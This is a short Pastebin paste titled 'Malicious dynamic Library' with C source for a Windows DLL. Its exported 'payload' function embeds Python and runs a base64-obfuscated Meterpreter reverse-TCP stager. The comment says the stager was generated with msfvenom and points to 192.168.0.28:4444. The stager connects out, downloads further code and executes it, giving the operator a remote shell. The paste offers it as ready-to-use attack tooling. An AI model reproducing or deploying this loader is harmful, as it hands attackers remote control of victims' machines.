Advertisement
Guest User

Malicious dynamic Library

a guest
Jan 6th, 2018
1,203
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.78 KB | None | 0 0
  1. #include<stdio.h>
  2. #include<Windows.h>
  3. #include<Python.h>
  4.  
  5. void CALLBACK payload(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
  6. {
  7.   Py_Initialize();
  8.   PyRun_SimpleString("import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yOCcsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))"); /* write here your python meterpreter payload : msfvenom --payload=python/meterpreter/reverse_tcp LHOST=192.168.0.28 LPORT=4444 */
  9.   Py_Finalize();  
  10. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement